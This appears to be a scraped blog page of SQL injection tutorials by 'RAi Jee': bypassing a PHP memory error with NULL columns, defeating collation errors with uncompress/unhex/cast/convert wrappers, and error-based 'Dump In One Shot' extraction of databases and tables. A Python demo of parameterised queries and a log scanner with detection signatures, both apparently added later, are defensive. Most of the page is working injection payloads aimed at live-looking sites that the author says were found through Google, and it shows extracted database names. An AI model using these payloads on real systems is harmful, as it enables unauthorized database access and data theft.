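    sql = "SELECT id, title FROM detail WHERE price > 0 ORDER BY title LIMIT ?,10"
    return con.execute(sql, (int(raw_id),)).fetchall()


def demo():
    """Run the page's two probes against both builders and report what happened."""
    con = make_db()
    out = {"legit_rows": len(query_vulnerable(con, "12"))}
    for name, payload in (("order_by", "12 order by 3-- -"),
                          ("union", "12 UNION SELECT 1,2,3-- -")):
        try:
            query_vulnerable(con, payload)
            out[name] = "no error"
        except sqlite3.OperationalError as exc:  # SQL syntax error, as on the page
            out[name] = f"db error: {exc}"
    try:
        query_safe(con, "12 order by 3-- -")
        out["safe"] = "accepted"
    except ValueError:
        out["safe"] = "rejected before query"
    out["safe_rows"] = len(query_safe(con, "12"))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<span style="font-size: small;">Run it directly to print each outcome: the string-built query fails with a database syntax error for both probes (the MySQL equivalents are the two errors shown above), while the parameterised version rejects the bad input with a ValueError and still returns the normal 10 rows for a legitimate id.</span><br />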
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial</b> (posted 2015-07-07, updated 2015-08-17)</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM5eNb2Qa_RIyWeTFUQXZ99rZQBGdne3Q7h4bG6z-lUjlbTiJLQO6_T88bey0ssJBsXYLDhbSzivoRyR2S9y3oVX2wakNNoDpb35rh5fig1i_oMRSky8rhhuUu-ckxilGk2Vqehc7NyzQl/s1600/Bypassing+Error+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted+-+tutorial+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM5eNb2Qa_RIyWeTFUQXZ99rZQBGdne3Q7h4bG6z-lUjlbTiJLQO6_T88bey0ssJBsXYLDhbSzivoRyR2S9y3oVX2wakNNoDpb35rh5fig1i_oMRSky8rhhuUu-ckxilGk2Vqehc7NyzQl/s320/Bypassing+Error+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted+-+tutorial+RAi+Jee.png" title="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" width="320" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">In this tutorial you will learn how to bypass the error Allowed Memory Size of XXXX Bytes Exhausted.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">While injecting we came to a site which gives us the error Allowed Memory Size of XXXX Bytes Exhausted when we <b>BUILD</b> our <b>Union Based</b> query.</span><br />
<span style="font-size: small;">This error occurs because PHP has no allowed memory left. There are lots of possible causes you can find on our Chaachu Google.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Hmmm, we will start with our normal injection. We found the site from Google while injecting and it is vulnerable to SQL injection.</span><br />
<span style="font-size: small;">First we will count the total number of columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 order by 5-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">No error!</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 order by 6-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
Again the site loaded normally and there is no error!</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 order by 7-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now we have got an error here:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Unknown column '7' in 'order clause'</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">It means there are 6 columns in total.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's execute our <b>UNION BASED</b> query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 and 0 Union SELECT 1,2,3,4,5,6-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing the <b>UNION BASED</b> query we got an error.</span><br />
<span style="font-size: small;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcjrr8xEpiGuSxbmMzHen6_nstj7MSIE05DcqbcbwRyDxsnmAef-W1aiCkL2aYmXgiJl4tzu33WNqL3VlKk0KoQIPbO-SY3R4GDp3fnBZ4DW_iB7A00VjVRas6XwP2juXwtetB1y_q6ly/s1600/bypassing+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted-RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" border="0" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcjrr8xEpiGuSxbmMzHen6_nstj7MSIE05DcqbcbwRyDxsnmAef-W1aiCkL2aYmXgiJl4tzu33WNqL3VlKk0KoQIPbO-SY3R4GDp3fnBZ4DW_iB7A00VjVRas6XwP2juXwtetB1y_q6ly/s640/bypassing+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted-RAi+Jee.png" title="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" width="640" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Fatal error</b>: Allowed memory size of 536870912 bytes exhausted (tried to allocate 534511572 bytes) in <b>/home/XXXX/public_html/cat_ver_producto.php</b> on line <b>166</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">The problem is with the PHP memory of the server. We will use <b>NULL</b> values instead of the column numbers to bypass the server's PHP memory usage for our SQL query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After putting NULL values our query will be:</span><br />
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 and 0 Union SELECT null,null,null,null,null,null-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Now The ERROR is GONE!!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">As we are using NULL values we don't know which column is vulnerable. So to find the vulnerable column we put <b>version()</b> into each column one by one until one of them gives us a result.</span><br />
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 and 0 Union SELECT version(),null,null,null,null,null-- -</b></span><br />
<span style="font-size: small;">After checking the first column, check the next one, and then the next, until we get the result. In this way we check all columns and find our vulnerable column.</span><br />
<span style="font-size: small;">When we find our vulnerable column we can put our queries for tables and columns in that vulnerable column.</span><br />
<span style="font-size: small;">If you don't know how to get tables and columns,</span><br />
<span style="font-size: small;">read from here: <b><a href="http://raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">Union Based SQL Injection</a></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing illegal Mix of Collations- Tutorial</b> (posted 2015-06-15, updated 2015-08-17)</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiiqUWT4-PTNQwKM8uXNCqXxQqgIjwd7urPndTy6qA3Sz0gYGnk2wjtlMDmT1z9YplaEFG_GiZpVQlt1Lhp3_8RfaZ372b1rm1q9Ls2I_-MkpS4_FOzE9bKiGq8OOs4kt2ecX9FT36g1Cp/s1600/tt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing illegal Mix of Collations- Tutorial" border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiiqUWT4-PTNQwKM8uXNCqXxQqgIjwd7urPndTy6qA3Sz0gYGnk2wjtlMDmT1z9YplaEFG_GiZpVQlt1Lhp3_8RfaZ372b1rm1q9Ls2I_-MkpS4_FOzE9bKiGq8OOs4kt2ecX9FT36g1Cp/s400/tt.png" title="Bypassing illegal Mix of Collations- Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing illegal Mix of Collations- Tutorial by RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We will continue our tutorials about SQL.</span><br />
<span style="font-size: small;">In this tutorial you will learn how to bypass illegal mix of collations.</span><br />
<span style="font-size: small;">Let's start with our regular SQL injection.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Our target:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">First we have to count how many columns it has.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 1-- - </b></span><br />
<span style="font-size: small;">No error!</span><br />
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 4-- - </b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>No error!</b></span><br />
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 6-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We got an error here.</span><br />
<span style="font-size: small;"><b>Unknown Column '6' in 'order by'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's reduce the column count.</span><br />
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 5-- -</b></span><br />
<span style="font-size: small;"><b>No error!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">There are 5 columns, so let's prepare our <b>UNION SELECT</b> command and find the vulnerable columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
We Got 2 and 3.</span><br />
<span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;">Let's try to get the <b>tables</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Oops!! We got an <b>error</b> here.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyDI_Jof-1RCp4FIl77Cz2aGD_5Eq7MH4sRJHSc9-gMMXKNx2cmGAe_uQ24Ny4SNAaBq3BkCef858ocQmdfzhMX-Be3RZ5t7tsPieexrSy4Wtz8zccE1WHtFba4trGXUa7orquBErZ1Y_k/s1600/1tu.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing illegal Mix of Collations- Tutorial" border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyDI_Jof-1RCp4FIl77Cz2aGD_5Eq7MH4sRJHSc9-gMMXKNx2cmGAe_uQ24Ny4SNAaBq3BkCef858ocQmdfzhMX-Be3RZ5t7tsPieexrSy4Wtz8zccE1WHtFba4trGXUa7orquBErZ1Y_k/s400/1tu.png" title="Bypassing illegal Mix of Collations- Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Illegal mix of collations for operation 'UNION'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here are some methods which we can use to <b>bypass illegal mix of collations for operation 'UNION'</b>:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>1. Using UNCOMPRESS(COMPRESS(our_query_here))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>BYPASSED !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>2. Using UNHEX(HEX(our_query_here))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>BYPASSED !! </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>3. Using CAST()</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,cast(table_name as binary),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>BYPASSED !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>4. Using CONVERT()</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> </b><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,convert(table_name using ascii),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>BYPASSED !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>SOME ADVANCED methods for CONVERT()</b></span><br />
<span style="font-size: small;">In the <b>CONVERT()</b> function, if <b>ascii</b> doesn't work then we can use one of these <b>character sets</b> instead of <b>ascii</b>.</span><br />
<ol>
<li><span style="font-size: small;"><b>ujis</b></span></li>
<li><span style="font-size: small;"><b>
ucs2</b></span></li>
<li><span style="font-size: small;"><b>
tis620</b></span></li>
<li><span style="font-size: small;"><b>
swe7</b></span></li>
<li><span style="font-size: small;"><b>
sjis</b></span></li>
<li><span style="font-size: small;"><b>
macroman</b></span></li>
<li><span style="font-size: small;"><b>
macce</b></span></li>
<li><span style="font-size: small;"><b>
latin7</b></span></li>
<li><span style="font-size: small;"><b>
latin5</b></span></li>
<li><span style="font-size: small;"><b>
latin2</b></span></li>
<li><span style="font-size: small;"><b>
koi8u</b></span></li>
<li><span style="font-size: small;"><b>
koi8r</b></span></li>
<li><span style="font-size: small;"><b>
keybcs2</b></span></li>
<li><span style="font-size: small;"><b>
hp8</b></span></li>
<li><span style="font-size: small;"><b>
geostd8</b></span></li>
<li><span style="font-size: small;"><b>
gbk</b></span></li>
<li><span style="font-size: small;"><b>
gb2312</b></span></li>
<li><span style="font-size: small;"><b>
armscii8</b></span></li>
<li><span style="font-size: small;"><b>
ascii</b></span></li>
<li><span style="font-size: small;"><b>
cp1250</b></span></li>
<li><span style="font-size: small;"><b>
big5</b></span></li>
<li><span style="font-size: small;"><b>
cp1251</b></span></li>
<li><span style="font-size: small;"><b>
cp1256</b></span></li>
<li><span style="font-size: small;"><b>
cp1257</b></span></li>
<li><span style="font-size: small;"><b>
cp850</b></span></li>
<li><span style="font-size: small;"><b>
cp852</b></span></li>
<li><span style="font-size: small;"><b>
cp866</b></span></li>
<li><span style="font-size: small;"><b>
cp932</b></span></li>
<li><span style="font-size: small;"><b>
dec8</b></span></li>
<li><span style="font-size: small;"><b>
euckr</b></span></li>
<li><span style="font-size: small;"><b>
latin1</b></span></li>
</ol>
<span style="font-size: small;">Hope it will help you in the <b>future</b>.</span><br />
<span style="font-size: small;"><br /></span>
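<span style="font-size: small;">Added example, not code from the original post: a small log-scanning script a defender can use to spot the request shapes shown in this post and the two posts above it (ORDER BY probing, UNION SELECT with numeric or NULL columns, PROCEDURE ANALYSE with extractvalue, and the uncompress/unhex/cast/convert wrappers used against the collation error), plus the floor(rand(0)*2) group-by shape used in the DIOS post below. The log lines are constructed and assume an Apache-style access log; the signature names and the helper functions are my own. The point it demonstrates is that percent-decoding, case-folding and comment stripping happen before matching, so UnION SEleCT and a wrapper such as unhex(hex(...)) around the same query trip the same rule.</span><br />

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined-style request lines assumed);
# the query strings are the payload shapes shown in the posts on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2015:10:01:12 +0000] "GET /detail.php?id=12 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Sep/2015:10:01:40 +0000] "GET /detail.php?id=12%20order%20by%206--%20- HTTP/1.1" 500 310
203.0.113.5 - - [05/Sep/2015:10:02:03 +0000] "GET /detail.php?id=12%20UnION%20SEleCT%201,2,3--%20- HTTP/1.1" 500 310
203.0.113.5 - - [05/Sep/2015:10:02:31 +0000] "GET /detail.php?id=12%20Procedure%20Analyse%28extractvalue%280,concat%280x27,@@version%29%29,1%29--%20- HTTP/1.1" 500 640
198.51.100.7 - - [05/Sep/2015:10:05:09 +0000] "GET /product.php?id=35+and+0+Union+SELECT+null,null,null,null,null,null--+- HTTP/1.1" 200 7000
198.51.100.7 - - [05/Sep/2015:10:06:00 +0000] "GET /detail.php?id=31+and+0+Union+Select+1,unhex(hex(concat(table_name))),3,4,5+from+information_schema.tables+where+table_schema=database()--+- HTTP/1.1" 200 7000
192.0.2.9 - - [05/Sep/2015:10:07:00 +0000] "GET /news.php?id=11+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--+- HTTP/1.1" 500 300
192.0.2.9 - - [05/Sep/2015:10:08:00 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 2200
"""

# One signature per technique the page shows, written against *normalised* text.
SIGNATURES = {
    "order_by_probe":    r"\border\s+by\s+\d+\b",
    "union_select":      r"\bunion\s+(?:all\s+)?select\b",
    "procedure_analyse": r"\bprocedure\s+analyse\s*\(",
    "xpath_error":       r"\bextractvalue\s*\(",
    "schema_read":       r"\binformation_schema\.(?:tables|columns|schemata)\b",
    "collation_wrap":    r"\b(?:uncompress\s*\(\s*compress|unhex\s*\(\s*hex"
                         r"|cast\s*\([^)]*\s+as\s+binary|convert\s*\([^)]*\s+using)\b",
    "error_based":       r"\bfloor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)",
}

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/')


def normalise(raw):
    """Decode twice (catches double percent-encoding and '+' spaces), drop
    MySQL inline comments, collapse whitespace and lower-case the result."""
    s = raw
    for _ in range(2):
        s = unquote_plus(s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def classify(query_string):
    """Return the sorted list of signature names that match a query string."""
    q = normalise(query_string)
    return sorted(name for name, pat in SIGNATURES.items() if re.search(pat, q))


def scan(log_text):
    """Walk the log and collect one finding per request that trips a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        path, _, qs = target.partition("?")
        hits = classify(qs)
        if hits:
            findings.append({"ip": ip, "time": ts, "path": path, "signatures": hits})
    return findings


def attempts_by_ip(findings):
    """Count flagged requests per source address, a cheap pivot for triage."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["path"], ",".join(f["signatures"]))
    print(dict(attempts_by_ip(found)))
```

<span style="font-size: small;">scan() returns one finding per flagged request with the list of matched signatures, and attempts_by_ip() gives the per-source count for triage; the two benign lines (a plain id and a search for "order form") produce no finding, which is the check worth keeping when you tune these patterns on real traffic.</span><br />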
<span style="font-size: small;">
<b>AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee</b></span>
<span style="font-size: small;"><b>Error Based Dump In One Shot - (DIOS)</b> (posted 2015-06-12, updated 2015-08-17)</span><br />
<span style="font-size: small;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQfqFA9BL5DAWliXP6vlnApUQ1hpZc6q8LrNuI9OddvTrgbqcl1Kpxj3ZB18G5tftaJHQJ_IqP95rB1RQXB3PnzG65GdvNAngnLlmD9pHxVVtH2OX4EDBcCWuExxhOqWg0LwP_opIttByk/s1600/tt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQfqFA9BL5DAWliXP6vlnApUQ1hpZc6q8LrNuI9OddvTrgbqcl1Kpxj3ZB18G5tftaJHQJ_IqP95rB1RQXB3PnzG65GdvNAngnLlmD9pHxVVtH2OX4EDBcCWuExxhOqWg0LwP_opIttByk/s400/tt.png" title="Error Based Dump In One Shot - (DIOS)" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Error Based Dump In One Shot (DIOS) - By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We discussed <a href="http://www.raijee1337.blogspot.com/2015/06/error-based-injection-tutorial.html" target="_blank">Error Based SQL Injection</a> in our previous tutorial.</span><br />
<span style="font-size: small;">In this tutorial you will learn how to build an Error Based Dump In One Shot (DIOS).</span><br />
<span style="font-size: small;">As we know, in an <b>error based query</b> we give our commands to the server and it gives us the result inside an error.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">If we want to get the version() then we give a query like this:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -<br /> </b></span><br />
<span style="font-size: small;">We get the version printed on the page: version=<b>5.5.42-cll</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkhUwJhEM6v7gbjKj82vmVAgPn-jfDluVy4ywyHIdH1eXD33ZjP8_-s-3kuF6py5M_pxMO9a9IQ2-k50ieW_-Iy0QHy0Ty4uWXDlqRnhXRu8hhPGCs4ofqkwMGbNeKh4jARSO0AqOh6AS/s1600/tut1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkhUwJhEM6v7gbjKj82vmVAgPn-jfDluVy4ywyHIdH1eXD33ZjP8_-s-3kuF6py5M_pxMO9a9IQ2-k50ieW_-Iy0QHy0Ty4uWXDlqRnhXRu8hhPGCs4ofqkwMGbNeKh4jARSO0AqOh6AS/s320/tut1.png" title="Error Based Dump In One Shot - (DIOS)" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now let's get the <b>primary database name</b>.</span><br />
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
And here is our <b>primary database</b>.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQJ84vYk8xyp9pCCPW8oiUme_Af0rJP3bD5G4555cmCvCQnBU6ugUlPkfsgjvY0Ki8m4qyM9ro06nMA5Ha4FkmyT_CyxPSs00J-uUzW0Y2s_eFPxfaIRN9XIMufOYyuLnckh7XTZUbebUw/s1600/tut3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="25" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQJ84vYk8xyp9pCCPW8oiUme_Af0rJP3bD5G4555cmCvCQnBU6ugUlPkfsgjvY0Ki8m4qyM9ro06nMA5Ha4FkmyT_CyxPSs00J-uUzW0Y2s_eFPxfaIRN9XIMufOYyuLnckh7XTZUbebUw/s640/tut3.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<span style="font-size: small;">This is our primary database name: "kkbaketo_wordpress".
If we want to get the others we usually increase <b>LIMIT 0,1</b> to <b>LIMIT 1,1</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">But we can also get all <b>databases</b> without using <b>LIMIT</b>.</span><br />
<span style="font-size: small;">Here is our <b>syntax</b> for getting all <b>databases</b>:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now add this <b>syntax</b> to get all <b>databases</b>:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLOPP7_23tKpEoDP7J2AsaNv_5r7qRdOK8EsGpQKqV9Fq9Kt4ZkVEU0UxvDgoGRbHHK-zU9qIivdUmYJVKyfmjEuWLosq-srnhkphydZ5TMYIQzJrHl-MgsFyk9I0f0bMgX2eeUj1ysJd/s1600/tut4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLOPP7_23tKpEoDP7J2AsaNv_5r7qRdOK8EsGpQKqV9Fq9Kt4ZkVEU0UxvDgoGRbHHK-zU9qIivdUmYJVKyfmjEuWLosq-srnhkphydZ5TMYIQzJrHl-MgsFyk9I0f0bMgX2eeUj1ysJd/s640/tut4.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<span style="font-size: small;">And these are our <b>databases</b>:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>information_schema,kkbaketo_wordpress</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Next step is to Get The<b> Tables.</b></span><br />
<span style="font-size: small;">Here is The Example.</span><br />
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -</b></span><br />
<span style="font-size: small;">and we Get Table name under Error response ::</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji_z_fN87rS2KKZh9x19jGNRVw40jL1yVXkakY6pQXvOgZFYSHG00Ns0NN1Lg9uk568Tt7UY93r_yF9_1yNkKuSBWpc5DruiUGgw_mWGnbpt2tKGoyXIgnIGa-6qOi_pXyedrDCVJmTdh/s1600/tut5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="25" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji_z_fN87rS2KKZh9x19jGNRVw40jL1yVXkakY6pQXvOgZFYSHG00Ns0NN1Lg9uk568Tt7UY93r_yF9_1yNkKuSBWpc5DruiUGgw_mWGnbpt2tKGoyXIgnIGa-6qOi_pXyedrDCVJmTdh/s640/tut5.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We just got one <b>TABLE Name</b>: <b>kkbaketop_category</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">That was our first table name. We can get the next one, and then another, by increasing the value of <b>LIMIT 0,1</b> to <b>LIMIT 1,1</b>, <b>LIMIT 2,1</b>, <b>LIMIT 3,1</b> and so on.</span><br />
<span style="font-size: small;">We increase the <b>LIMIT</b> for <b>Tables</b>:</span><br />
<span style="font-size: small;"><b>LIMIT 0,1 for the 1st table.</b></span><br />
<span style="font-size: small;"><b>LIMIT 1,1 for the 2nd table.</b></span><br />
<span style="font-size: small;">As we know, we can <b>DUMP</b> all tables and columns in <b>UNION BASED</b> injection.</span><br />
<span style="font-size: small;">In <b>ERROR BASED Dump in One Shot (DIOS)</b> we cannot dump all tables/columns the way <b>UNION BASED</b> injection does, because everything has to fit inside a single error message.</span><br />
<span style="font-size: small;">But we can get some <b>Tables/Columns</b> from the <b>Database</b> by <b>BUILDING</b> our <b>Query</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
